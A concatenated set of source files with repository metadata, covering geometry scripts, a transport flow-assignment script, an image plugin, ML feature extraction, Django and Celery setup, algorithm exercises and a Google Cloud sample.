if config_database.lower() != existing_database.lower():
pyfusion.orm_manager.shutdown_orm()
if config_database.lower() != 'none':
pyfusion.orm_manager.load_orm()
def clear_config():
"""Clear pyfusion.config."""
import pyfusion
pyfusion.config = pyfusion.conf.PyfusionConfigParser()
|
[
"j.gresl12@gmail.com"
] |
j.gresl12@gmail.com
|
ee66a6bd15526f6ff00f62a9ee1641bd9236a49f
|
66e06eec0d72dd0f1fbbf2985bbbda858591bffc
|
/2016/007-Mathsjam/CircleInTriangle.py
|
5c15fba7fb64885b75eff5dac15c497aec504ad1
|
[] |
no_license
|
kobylin/Lab
|
b35cd5eba8087946d475202e4d36ef7329bb74a5
|
35a33d84e0de6c891c34aa2806052b5f695f527d
|
refs/heads/master
| 2021-08-30T07:12:52.955872
| 2017-12-16T16:14:27
| 2017-12-16T16:14:27
| 114,474,224
| 0
| 0
| null | 2017-12-16T16:21:33
| 2017-12-16T16:21:33
| null |
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
from sympy import Point,Line,Circle,intersection,Triangle,N
from svg import Svg
C = Point(0,8)
D = Point(0,2)
xaxis = Line(Point(0,0),Point(1,0))
CircleD = Circle(D,2)
tangentE = CircleD.tangent_lines(C)[0]
E = intersection(tangentE,CircleD)[0]
A = intersection(tangentE, xaxis)[0]
CircleD = Circle(D,2)
svg = Svg()
svg.append(C,"C")
#svg.append(D)
svg.append(CircleD,"CircleD")
svg.append(tangentE,"tangE")
svg.append(E,"E")
svg.append(A,"A")
def find_circle(circle,A,C,D,i):
AD = Line(A,D)
svg.append(AD,"AD",i)
K = intersection(circle, AD)[0]
svg.append(K,"K",i)
tangentK = Line(A,D).perpendicular_line(K)
svg.append(tangentK,"tangK",i)
P1 = intersection(tangentK, Line(A,C))[0]
svg.append(P1,"P1",i)
P2 = intersection(tangentK, xaxis)[0]
svg.append(P2,"P2",i)
T = Triangle(P1,A,P2)
svg.append(T,"T",i)
return T.incircle
circle = CircleD
for i in range(1):
circle = find_circle(circle,A,C,D,i)
svg.append(circle,"circle",i)
svg.close()
|
[
"janchrister.nilsson@gmail.com"
] |
janchrister.nilsson@gmail.com
|
2823a48cbeebcac8a5b49aeb6306ea0ebabe21e0
|
01f535557c2275a0c0cd91687d52c644e8176d00
|
/src/vtra/analysis/flow_assignment/industry_flows.py
|
f08d77411f7d216c3c28a8190c7613a014fea9c4
|
[] |
no_license
|
mmc00/oia-transport-archive
|
a8eaf72751a2c11b2cc2dc475e6eed2421d75381
|
f89cb686704fe76c1665697b35d14caccf37f3a1
|
refs/heads/master
| 2022-03-28T17:44:41.915217
| 2020-01-09T16:22:10
| 2020-01-09T16:22:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,444
|
py
|
"""Summarise hazard data
Get OD data and process it
Author: Raghav Pant
Date: April 20, 2018
"""
import configparser
import csv
import glob
import os
import fiona
import fiona.crs
import rasterio
from sqlalchemy import create_engine
import subprocess as sp
import psycopg2
import osgeo.ogr as ogr
import pandas as pd
import copy
import ast
from osgeo import gdal
import geopandas as gpd
from shapely.geometry import Point
from geoalchemy2 import Geometry, WKTElement
import numpy as np
from vtra.utils import load_config
from vtra.dbutils import *
import vtra.transport_network_creation as tnc
def main():
'''
Create the database connection
'''
conf = load_config()
try:
conn = psycopg2.connect(**conf['database'])
except:
print ("I am unable to connect to the database")
curs = conn.cursor()
    engine = create_engine('postgresql://{user}:{password}@{host}:{port}/{database}'.format(
        **conf['database']
    ))
od_data_file = os.path.join(conf['paths']['data'], 'od_data', 'OD_transport_data_2008_v2.xlsx')
'''
    Step 2: Create the OD proportions for the different modes
'''
'''
First get the modal shares
'''
modes = ['road','rail','air','water']
mode_cols = ['road','rail','air','inland','coastal']
new_mode_cols = ['o','d','road','rail','air','water']
mode_table = ['airport_nodes','waternodes','railnetworknodes','road2009nodes']
mode_edge_tables = ['airport_edges','wateredges','railnetworkedges','road2009edges']
mode_flow_tables = []
for mo in mode_edge_tables:
fl_table = mo + '_flows'
mode_flow_tables.append(fl_table)
'''
Get the modal shares
'''
od_data_modes = pd.read_excel(od_data_file,sheet_name = 'mode').fillna(0)
# od_data_modes.columns = map(str.lower, od_data_modes.columns)
o_id_col = 'o'
d_id_col = 'd'
od_data_modes['total'] = od_data_modes[mode_cols].sum(axis=1)
for m in mode_cols:
od_data_modes[m] = od_data_modes[m]/od_data_modes['total'].replace(np.inf, 0)
od_data_modes['water'] = od_data_modes['inland'] + od_data_modes['coastal']
od_data_modes = od_data_modes.fillna(0)
# od_data_modes.to_csv('mode_frac.csv',index = False)
od_fracs = od_data_modes[new_mode_cols]
od_data_com = pd.read_excel(od_data_file,sheet_name = 'goods').fillna(0)
ind_cols = ['sugar','wood','steel','constructi','cement','fertilizer','coal','petroluem','manufactur','fishery','meat']
od_fracs = pd.merge(od_fracs,od_data_com,how='left', on=['o','d'])
del od_data_com,od_data_modes
od_fracs = od_fracs.fillna(0)
# od_fracs.to_csv('od_fracs.csv')
for ind in ind_cols:
'''
Step 2 assign the crop to the closest transport mode node
'''
# mode_table = ['road2009nodes','railwaynetworknodes','airport_nodes','waternodes']
# mode_edge_tables = ['road2009edges','railwaynetworkedges','airport_edges','wateredges']
# modes = ['road','rail','air','water']
modes = ['air','water','rail','road']
mode_id = 'node_id'
od_id = 'od_id'
pop_id = 'population'
o_id_col = 'o'
d_id_col = 'd'
'''
Get the network
'''
eid = 'edge_id'
nfid = 'node_f_id'
ntid = 'node_t_id'
spid = 'speed'
gmid = 'geom'
o_id_col = 'o'
d_id_col = 'd'
'''
Get the node edge flows
'''
excel_writer = pd.ExcelWriter('vietnam_flow_stats_' + ind + '.xlsx')
for m in range(len(mode_table)):
od_nodes_regions = []
sql_query = '''select {0}, {1}, 100*{2}/(sum({3}) over (Partition by {4})) from {5}
'''.format(mode_id,od_id,pop_id,pop_id,od_id,mode_table[m])
curs.execute(sql_query)
read_layer = curs.fetchall()
if read_layer:
for row in read_layer:
n = row[0]
r = row[1]
p = float(row[2])
if p > 0:
od_nodes_regions.append((n,r,p))
all_net_dict = {'edge':[],'from_node':[],'to_node':[],'distance':[],'speed':[],'travel_cost':[]}
all_net_dict = tnc.create_network_dictionary(all_net_dict,mode_edge_tables[m],eid,nfid,ntid,spid,'geom',curs,conn)
od_net = tnc.create_igraph_topology(all_net_dict)
'''
Get the OD flows
'''
net_dict = {'Origin_id':[],'Destination_id':[],'Origin_region':[],'Destination_region':[],'Tonnage':[],'edge_path':[],'node_path':[]}
ofile = 'network_od_flows_' + ind + modes[m] + '.csv'
output_file = open(ofile,'w')
wr = csv.writer(output_file, delimiter=',', quoting=csv.QUOTE_MINIMAL)
wr.writerow(net_dict.keys())
ind_mode = modes[m]+ '_' + ind
od_fracs[ind_mode] = od_fracs[modes[m]]*od_fracs[ind]
od_flows = list(zip(od_fracs[o_id_col].values.tolist(),od_fracs[d_id_col].values.tolist(),od_fracs[ind_mode].values.tolist()))
origins = list(set(od_fracs[o_id_col].values.tolist()))
destinations = list(set(od_fracs[d_id_col].values.tolist()))
dflows = []
# print (od_flows)
for o in origins:
for d in destinations:
fval = [fl for (org,des,fl) in od_flows if org == o and des == d]
if len(fval) == 1 and fval[0] > 0:
o_matches = [(item[0],item[2]) for item in od_nodes_regions if item[1] == o]
if len(o_matches) > 0:
for o_vals in o_matches:
o_val = 1.0*fval[0]*(1.0*o_vals[1]/100)
o_node = o_vals[0]
d_matches = [(item[0],item[2]) for item in od_nodes_regions if item[1] == d]
if len(d_matches) > 0:
for d_vals in d_matches:
od_val = 1.0*o_val*(1.0*d_vals[1]/100)
d_node = d_vals[0]
if od_val > 0 and o_node != d_node:
# od_net = tnc.add_igraph_costs(od_net,t_val,0)
orgn_node = od_net.vs['node'].index(o_node)
dest_node = od_net.vs['node'].index(d_node)
# n_pth = od_net.get_shortest_paths(orgn_node,to = dest_node, weights = 'travel_cost', mode = 'OUT', output='vpath')[0]
e_pth = od_net.get_shortest_paths(orgn_node,to = dest_node, weights = 'travel_cost', mode = 'OUT', output='epath')[0]
# n_list = [od_net.vs[n]['node'] for n in n_pth]
e_list = [od_net.es[n]['edge'] for n in e_pth]
# cst = sum([od_net.es[n]['cost'] for n in e_pth])
net_dict = {'Origin_id':o_node,'Destination_id':d_node,'Origin_region':o,'Destination_region':d,
'Tonnage':od_val,'edge_path':e_list,'node_path':[o_node,d_node]}
wr.writerow(net_dict.values())
dflows.append((str([o_node,d_node]),str(e_list),od_val))
print (o,d,fval,modes[m],ind)
node_table = modes[m] + '_node_flows'
edge_table = modes[m] + '_edge_flows'
# dom_flows = pd.read_csv(ofile).fillna(0)
dom_flows = pd.DataFrame(dflows,columns = ['node_path', 'edge_path','Tonnage'])
flow_node_edge = dom_flows.groupby(['node_path', 'edge_path'])['Tonnage'].sum().reset_index()
n_dict = {}
e_dict = {}
n_dict,e_dict = get_node_edge_flows(flow_node_edge,n_dict,e_dict)
node_list = get_id_flows(n_dict)
df = pd.DataFrame(node_list, columns = ['node_id',ind])
df.to_excel(excel_writer,node_table,index = False)
excel_writer.save()
edge_list = get_id_flows(e_dict)
df = pd.DataFrame(edge_list, columns = ['edge_id',ind])
df.to_excel(excel_writer,edge_table,index = False)
excel_writer.save()
if df.empty:
add_zeros_columns_to_table_psycopg2(mode_flow_tables[m], [ind],['double precision'],conn)
else:
df.to_sql('dummy_flows', engine, if_exists = 'replace', schema = 'public', index = False)
add_columns_to_table_psycopg2(mode_flow_tables[m], 'dummy_flows', [ind],['double precision'], 'edge_id',conn)
curs.close()
conn.close()
if __name__ == '__main__':
main()
|
[
"tomalrussell@gmail.com"
] |
tomalrussell@gmail.com
|
4ca5452f0df11cd0388491948693a1c50cf6a03e
|
6be1990abf99c85ef886b49dcea1824aabb648d3
|
/weixinofneolocal/weixinofneolocal/libs/PIL/GbrImagePlugin.py
|
ff0f60f5d130760331d401418d04076713c432fc
|
[] |
no_license
|
neoguojing/cloudServer
|
b53ae205efe52cf0aea28dbb9e6c16c20caf991f
|
7c19101789b0c46474269e4c8fe00e92203e9cd7
|
refs/heads/master
| 2020-12-04T23:02:23.551479
| 2017-09-22T03:08:35
| 2017-09-22T03:08:35
| 67,382,984
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,635
|
py
|
#
# The Python Imaging Library
# $Id$
#
# load a GIMP brush file
#
# History:
# 96-03-14 fl Created
#
# Copyright (c) Secret Labs AB 1997.
# Copyright (c) Fredrik Lundh 1996.
#
# See the README file for information on usage and redistribution.
#
import Image, ImageFile
def i32(c):
return ord(c[3]) + (ord(c[2]) << 8) + (ord(c[1]) << 16) + (ord(c[0]) << 24L)
def _accept(prefix):
return i32(prefix) >= 20 and i32(prefix[4:8]) == 1
##
# Image plugin for the GIMP brush format.
class GbrImageFile(ImageFile.ImageFile):
format = "GBR"
format_description = "GIMP brush file"
def _open(self):
header_size = i32(self.fp.read(4))
version = i32(self.fp.read(4))
if header_size < 20 or version != 1:
raise SyntaxError, "not a GIMP brush"
width = i32(self.fp.read(4))
height = i32(self.fp.read(4))
bytes = i32(self.fp.read(4))
if width <= 0 or height <= 0 or bytes != 1:
raise SyntaxError, "not a GIMP brush"
comment = self.fp.read(header_size - 20)[:-1]
self.mode = "L"
self.size = width, height
self.info["comment"] = comment
# Since the brush is so small, we read the data immediately
self.data = self.fp.read(width * height)
def load(self):
if not self.data:
return
# create an image out of the brush data block
self.im = Image.core.new(self.mode, self.size)
self.im.fromstring(self.data)
self.data = ""
#
# registry
Image.register_open("GBR", GbrImageFile, _accept)
Image.register_extension("GBR", ".gbr")
|
[
"guojing_neo@163.com"
] |
guojing_neo@163.com
|
c2afa2f4ed3d27b5eb256f45fbb043bb45179a34
|
e167dfb535b72f56ea3c30c498f2a74324e9e04c
|
/app/common/model_utils.py
|
7b0f98496899cb726bdd5a7ea11ccb8adc155300
|
[
"MIT"
] |
permissive
|
wlmsoft/Alpha-Gobang-Zero
|
ebde341af3ac6ecd9b6a71fdb0decedce078d2e8
|
f836aee7147aa2aeb47dd8b370f94950b833718d
|
refs/heads/master
| 2023-07-23T20:40:51.448213
| 2021-09-02T14:42:25
| 2021-09-02T14:42:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 327
|
py
|
# coding:utf-8
import torch
from alphazero import PolicyValueNet
def testModel(model: str):
""" 测试模型是否可用
Parameters
----------
model: str
模型路径
"""
try:
model = torch.load(model)
return isinstance(model, PolicyValueNet)
except:
return False
|
[
"1319158137@qq.com"
] |
1319158137@qq.com
|
bd15811b1f2fa433f9fbce560c2bb146a9882c43
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/built-in/nlp/Bert-text-classification_for_PyTorch/transformers/src/transformers/models/convnext/feature_extraction_convnext.py
|
860bda96b6d2ca7b488d2f710a55318ee5e5e41c
|
[
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 7,348
|
py
|
# coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for ConvNeXT."""
from typing import Optional, Union
import numpy as np
from PIL import Image
from ...feature_extraction_utils import BatchFeature, FeatureExtractionMixin
from ...file_utils import TensorType
from ...image_utils import (
IMAGENET_DEFAULT_MEAN,
IMAGENET_DEFAULT_STD,
ImageFeatureExtractionMixin,
ImageInput,
is_torch_tensor,
)
from ...utils import logging
logger = logging.get_logger(__name__)
class ConvNextFeatureExtractor(FeatureExtractionMixin, ImageFeatureExtractionMixin):
r"""
Constructs a ConvNeXT feature extractor.
This feature extractor inherits from [`FeatureExtractionMixin`] which contains most of the main methods. Users
should refer to this superclass for more information regarding those methods.
Args:
do_resize (`bool`, *optional*, defaults to `True`):
Whether to resize (and optionally center crop) the input to a certain `size`.
size (`int`, *optional*, defaults to 224):
Resize the input to the given size. If 384 or larger, the image is resized to (`size`, `size`). Else, the
smaller edge of the image will be matched to int(`size`/ `crop_pct`), after which the image is cropped to
`size`. Only has an effect if `do_resize` is set to `True`.
resample (`int`, *optional*, defaults to `PIL.Image.BICUBIC`):
An optional resampling filter. This can be one of `PIL.Image.NEAREST`, `PIL.Image.BOX`,
`PIL.Image.BILINEAR`, `PIL.Image.HAMMING`, `PIL.Image.BICUBIC` or `PIL.Image.LANCZOS`. Only has an effect
if `do_resize` is set to `True`.
crop_pct (`float`, *optional*):
The percentage of the image to crop. If `None`, then a cropping percentage of 224 / 256 is used. Only has
an effect if `do_resize` is set to `True` and `size` < 384.
do_normalize (`bool`, *optional*, defaults to `True`):
Whether or not to normalize the input with mean and standard deviation.
image_mean (`List[int]`, defaults to `[0.485, 0.456, 0.406]`):
The sequence of means for each channel, to be used when normalizing images.
image_std (`List[int]`, defaults to `[0.229, 0.224, 0.225]`):
The sequence of standard deviations for each channel, to be used when normalizing images.
"""
model_input_names = ["pixel_values"]
def __init__(
self,
do_resize=True,
size=224,
resample=Image.BICUBIC,
crop_pct=None,
do_normalize=True,
image_mean=None,
image_std=None,
**kwargs
):
super().__init__(**kwargs)
self.do_resize = do_resize
self.size = size
self.resample = resample
self.crop_pct = crop_pct
self.do_normalize = do_normalize
self.image_mean = image_mean if image_mean is not None else IMAGENET_DEFAULT_MEAN
self.image_std = image_std if image_std is not None else IMAGENET_DEFAULT_STD
def __call__(
self, images: ImageInput, return_tensors: Optional[Union[str, TensorType]] = None, **kwargs
) -> BatchFeature:
"""
Main method to prepare for the model one or several image(s).
<Tip warning={true}>
NumPy arrays and PyTorch tensors are converted to PIL images when resizing, so the most efficient is to pass
PIL images.
</Tip>
Args:
images (`PIL.Image.Image`, `np.ndarray`, `torch.Tensor`, `List[PIL.Image.Image]`, `List[np.ndarray]`, `List[torch.Tensor]`):
The image or batch of images to be prepared. Each image can be a PIL image, NumPy array or PyTorch
tensor. In case of a NumPy array/PyTorch tensor, each image should be of shape (C, H, W), where C is a
number of channels, H and W are image height and width.
return_tensors (`str` or [`~file_utils.TensorType`], *optional*, defaults to `'np'`):
If set, will return tensors of a particular framework. Acceptable values are:
- `'tf'`: Return TensorFlow `tf.constant` objects.
- `'pt'`: Return PyTorch `torch.Tensor` objects.
- `'np'`: Return NumPy `np.ndarray` objects.
- `'jax'`: Return JAX `jnp.ndarray` objects.
Returns:
[`BatchFeature`]: A [`BatchFeature`] with the following fields:
- **pixel_values** -- Pixel values to be fed to a model, of shape (batch_size, num_channels, height,
width).
"""
# Input type checking for clearer error
valid_images = False
# Check that images has a valid type
if isinstance(images, (Image.Image, np.ndarray)) or is_torch_tensor(images):
valid_images = True
elif isinstance(images, (list, tuple)):
if len(images) == 0 or isinstance(images[0], (Image.Image, np.ndarray)) or is_torch_tensor(images[0]):
valid_images = True
if not valid_images:
raise ValueError(
"Images must of type `PIL.Image.Image`, `np.ndarray` or `torch.Tensor` (single example), "
"`List[PIL.Image.Image]`, `List[np.ndarray]` or `List[torch.Tensor]` (batch of examples)."
)
is_batched = bool(
isinstance(images, (list, tuple))
and (isinstance(images[0], (Image.Image, np.ndarray)) or is_torch_tensor(images[0]))
)
if not is_batched:
images = [images]
# transformations (resizing and optional center cropping + normalization)
if self.do_resize and self.size is not None:
if self.size >= 384:
# warping (no cropping) when evaluated at 384 or larger
images = [self.resize(image=image, size=self.size, resample=self.resample) for image in images]
else:
if self.crop_pct is None:
self.crop_pct = 224 / 256
size = int(self.size / self.crop_pct)
# to maintain same ratio w.r.t. 224 images
images = [
self.resize(image=image, size=size, default_to_square=False, resample=self.resample)
for image in images
]
images = [self.center_crop(image=image, size=self.size) for image in images]
if self.do_normalize:
images = [self.normalize(image=image, mean=self.image_mean, std=self.image_std) for image in images]
# return as BatchFeature
data = {"pixel_values": images}
encoded_inputs = BatchFeature(data=data, tensor_type=return_tensors)
return encoded_inputs
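# A hedged usage sketch, not part of the generated file (assumes Pillow is
# installed; "example.png" is a placeholder image path):
#
# from PIL import Image
# extractor = ConvNextFeatureExtractor(size=224)
# inputs = extractor(images=Image.open("example.png"), return_tensors="np")
# print(inputs["pixel_values"].shape)  # e.g. (1, num_channels, 224, 224)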
|
[
"dongwenbo6@huawei.com"
] |
dongwenbo6@huawei.com
|
34fbcbb5b07243310281ddcea4e59205032d636b
|
153da69b35f032f5b83a06f17008ba41a1b336b4
|
/src/demo/__init__.py
|
da984a42f90721752b48b31d39530ff3bf6f8ff9
|
[
"MIT"
] |
permissive
|
TrendingTechnology/hspylib
|
6400cadf9dfe6ab5733712dcfeccf8022d61c589
|
c79a2c17e89fe21d00ccd9c1646a03407cd61839
|
refs/heads/master
| 2023-06-20T15:47:35.962661
| 2021-07-19T22:12:18
| 2021-07-19T23:45:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
# _*_ coding: utf-8 _*_
#
# HSPyLib v0.11.1
#
# Package: demo
"""Package initialization."""
__all__ = [
'calculator',
'cli',
'phonebook'
]
|
[
"yorevs@gmail.com"
] |
yorevs@gmail.com
|
30b2b633485473169ebe3f7392c7b57e23c0e4d2
|
da7a165522daea7c346693c5f32850017c482967
|
/leetcode/60questions/347_top_k_frequent_elements.py
|
b13499eff1c603b9085c6ed2ac07a357fad804ac
|
[] |
no_license
|
SShayashi/ABC
|
19f8750919208c5ff8935638dbaab941c255f914
|
3cbfee0c5251c1bb0df6306166d8d4b33bf7bb2c
|
refs/heads/master
| 2021-05-04T21:06:10.720367
| 2020-07-11T13:59:16
| 2020-07-11T13:59:29
| 119,886,572
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 939
|
py
|
from typing import List
class Solution:
def topKFrequent(self, nums: List[int], k: int) -> List[int]:
d = {}
for num in nums:
d[num] = d[num] + 1 if d.get(num, 0) else 1
tmp = list(d.items())
tmp.sort(key=lambda x: x[1], reverse=True)
ans = []
for i in range(k):
ans.append(tmp[i][0])
return ans
def maxheaplify(nums: List[int], i):
    # sift nums[i] down until the max-heap property holds below it
    left_i = i * 2 + 1
    right_i = i * 2 + 2
    if left_i >= len(nums):
        return
    left = nums[left_i]
    right = nums[right_i] if right_i < len(nums) else -9999999
    large_child_i = left_i if left > right else right_i
    if nums[i] < nums[large_child_i]:
        nums[i], nums[large_child_i] = nums[large_child_i], nums[i]
        maxheaplify(nums, large_child_i)
def heaplify(nums: List[int]):
length = len(nums)
for i in reversed(range(length // 2)):
maxheaplify(nums, i)
return nums
y = [3, 5, 6, 8, 2, 3, 4, 5, 21, 1, 4, 5, 7, 9, 2, 22]
print(heaplify(y))
|
[
"sshayashi0208@gmail.com"
] |
sshayashi0208@gmail.com
|
ff99da7f9a431c6ffe09cca96a217b4f38518c7a
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/merge_20200722101228.py
|
fc5063ed0117fd9fbf7a41674a7bab7060ccc3e0
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 477
|
py
|
items = []
def mergeSort(data):
    if len(data) > 1:
        mid = len(data) // 2
        leftArr = data[:mid]
        rightArr = data[mid:]
        # sort each half before merging
        mergeSort(leftArr)
        mergeSort(rightArr)
        # now to perform the merge
        i = 0
        j = 0
        k = 0
        while i < len(leftArr) and j < len(rightArr):
            if leftArr[i] < rightArr[j]:
                data[k] = leftArr[i]
                i += 1
            else:
                data[k] = rightArr[j]
                j += 1
            k += 1
        # copy any remaining elements from either half
        while i < len(leftArr):
            data[k] = leftArr[i]
            i += 1
            k += 1
        while j < len(rightArr):
            data[k] = rightArr[j]
            j += 1
            k += 1
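# Hypothetical quick check, not in the original .history snapshot:
# data = [38, 27, 43, 3, 9, 82, 10]
# mergeSort(data)
# print(data)  # -> [3, 9, 10, 27, 38, 43, 82]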
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
bde3cdffacb74c379934c3b976da5ac53db144a3
|
51e93332b5b0221bb1b34d4b53f761d9d53e1b9c
|
/app/core/migrations/0001_initial.py
|
a88ea9f86995282d556a7ffaa56cd09c1bfd0e23
|
[
"MIT"
] |
permissive
|
MaistrenkoAnton/TDD
|
286d0cb0d24c796f045eeac4d03f29ac3bf0ab5a
|
20049d08f22aeeb626a7975bbee3dc5c95c76449
|
refs/heads/master
| 2020-06-02T03:32:20.396472
| 2019-08-05T12:24:57
| 2019-08-05T12:24:57
| 191,021,446
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,707
|
py
|
# Generated by Django 2.1.9 on 2019-06-09 19:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
|
[
"it2015maistrenko@gmail.com"
] |
it2015maistrenko@gmail.com
|
710826787f7469b5c8d8e68f530a894b8067623e
|
f24f8a5cf1580470cf616705a220027feac9b177
|
/awesome/api/awesome/celery.py
|
ecb47c15ebd34979cbb44196e89352deda7f603a
|
[] |
no_license
|
tvtrong/restapi
|
4f5eb4ad545ed9dd7847f63994957fdc76fc3eba
|
c3da498108df1e7950ea2cc003dd75f0fe5a1b60
|
refs/heads/master
| 2022-12-25T19:39:45.627411
| 2020-10-10T12:39:33
| 2020-10-10T12:39:33
| 302,898,797
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
import os
from celery import Celery
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "awesome.settings")
celery_app = Celery("awesome")
celery_app.config_from_object("django.conf:settings", namespace="CELERY")
celery_app.autodiscover_tasks()
|
[
"phongtaitieu@gmail.com"
] |
phongtaitieu@gmail.com
|
746774617ed9e37b03bbc24665b63b4a592bf514
|
baf3996414315ffb60470c40c7ad797bf4e6897f
|
/02_ai/1_ml/4_ml_mastery/code/chapter_09/shuffle_split.py
|
300dc2268fc15665661c5450849e0a375e9836d3
|
[
"MIT"
] |
permissive
|
thiago-allue/portfolio
|
8fbbecca7ce232567aebe97c19944f444508b7f4
|
0acd8253dc7c5150fef9b2d46eead3db83ca42de
|
refs/heads/main
| 2023-03-15T22:10:21.109707
| 2022-09-14T17:04:35
| 2022-09-14T17:04:35
| 207,919,073
| 0
| 0
| null | 2019-11-13T18:18:23
| 2019-09-11T22:40:46
|
Python
|
UTF-8
|
Python
| false
| false
| 733
|
py
|
# Evaluate using Shuffle Split Cross Validation
from pandas import read_csv
from sklearn.model_selection import ShuffleSplit
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import LogisticRegression
filename = 'pima-indians-diabetes.data.csv'
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = read_csv(filename, names=names)
array = dataframe.values
X = array[:,0:8]
Y = array[:,8]
n_splits = 10
test_size = 0.33
seed = 7
kfold = ShuffleSplit(n_splits=n_splits, test_size=test_size, random_state=seed)
model = LogisticRegression()
results = cross_val_score(model, X, Y, cv=kfold)
print("Accuracy: %.3f%% (%.3f%%)" % (results.mean()*100.0, results.std()*100.0))
|
[
"thiago.allue@yahoo.com"
] |
thiago.allue@yahoo.com
|
c62c24e115cdf1835d84b2b7bb4b7def2fbadcf6
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-dms/samples/generated_samples/datamigration_v1_generated_data_migration_service_stop_migration_job_async.py
|
a4bc8f0f5878cfe73e659344426766b46ce49d17
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,959
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for StopMigrationJob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dms
# [START datamigration_v1_generated_DataMigrationService_StopMigrationJob_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import clouddms_v1
async def sample_stop_migration_job():
# Create a client
client = clouddms_v1.DataMigrationServiceAsyncClient()
# Initialize request argument(s)
request = clouddms_v1.StopMigrationJobRequest(
)
# Make the request
operation = client.stop_migration_job(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
# [END datamigration_v1_generated_DataMigrationService_StopMigrationJob_async]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
32899d3e754390786ab649a1de26f959c3d28b8e
|
ebd6f68d47e192da7f81c528312358cfe8052c8d
|
/swig/Examples/test-suite/python/overload_template_runme.py
|
014ec71cbb0db5035821e801e8ec2cb7a7342c9d
|
[
"LicenseRef-scancode-swig",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference",
"GPL-3.0-only",
"Apache-2.0"
] |
permissive
|
inishchith/DeepSpeech
|
965ad34d69eb4d150ddf996d30d02a1b29c97d25
|
dcb7c716bc794d7690d96ed40179ed1996968a41
|
refs/heads/master
